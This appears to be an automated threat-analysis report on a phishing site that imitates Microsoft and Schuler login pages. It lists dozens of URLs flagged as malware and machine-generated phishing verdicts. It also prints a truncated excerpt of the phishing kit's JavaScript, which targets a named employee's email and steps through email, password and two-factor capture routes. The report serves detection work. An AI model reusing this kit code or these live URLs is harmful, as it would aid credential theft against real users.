Source: https://vkwek.ckyucle.com/opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/12TvEGAMcd3aPS6720 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180 |
Avira URL Cloud: Label: malware |
Source: https://nzd92.6gniu68.ru/5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/2DUx/ |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/favicon.ico |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/2DUx/#- |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/78l8NmRVxJ45fjuJRst60 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/45TplGCNDXCptZb896Wyz84jpQxy69 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/yzBt71gp856BSdkJ4Qop47 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/pqJEZxAGJZqUBhc85R9yzrCUwx40 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/2DUx/?W-crystal.begin@schulergroup.com |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/xy12R7tzrssHzef25 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0ag |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/ef6ywsH6ValAwIHzgds78wUwuLf89smkl92 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com |
LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://vkwek.ckyucle.com' does not match the legitimate domain 'microsoft.com' associated with the brand Microsoft. The presence of a prominent login form asking for email credentials is a common phishing tactic. The domain name appears suspicious and unrelated to Microsoft, indicating potential phishing. The image resembles a legitimate Microsoft login page, which is a social usering technique to mislead users. Additionally, the presence of a suspicious link ('No account? Create one!') that could potentially lead to a harmful page further supports the phishing suspicion. DOM: 2.5.pages.csv |
Source: https://vkwek.ckyucle.com |
LLM: Score: 9 brands: Schuler Reasons: The URL 'https://vkwek.ckyucle.com' does not match the legitimate domain 'schulergroup.com' associated with the Schuler brand. The presence of a prominent login form asking for a password is a common phishing tactic. The domain name is highly suspicious and does not align with the legitimate domain. The use of social usering techniques is evident as the site mimics a legitimate login page to deceive users into entering their credentials. Additionally, the link to 'Forgot my password' could potentially lead to further phishing attempts. DOM: 2.7.pages.csv |
Source: Yara match |
File source: 2.5.pages.csv, type: HTML |
Source: Yara match |
File source: 2.6.pages.csv, type: HTML |
Source: Yara match |
File source: 2.7.pages.csv, type: HTML |
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs |
Matcher: Found strong image similarity, brand: MICROSOFT |
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs |
Matcher: Template: microsoft matched |
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs |
Matcher: Template: microsoft matched |
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal |
Matcher: Template: captcha matched |
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal |
Matcher: Template: captcha matched |
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs |
HTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "XkpxX";var emailcheck = "crystal.begin@schulergroup.com";var webname = "rtrim(/web8/, '/')";var urlo = "rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2";var gdf = "ijG4yW3R7FY813hQeumBEAUyzYJiiCY97PHkccd114";var odf = "ghU2EPAQmKCucHi9wxct32lto7kIab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome|chromium|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false || route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;}if(route == "checkpass"){randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;}if(route == "twofaselect"){randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;}if(route == "twofaselected"){randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(r |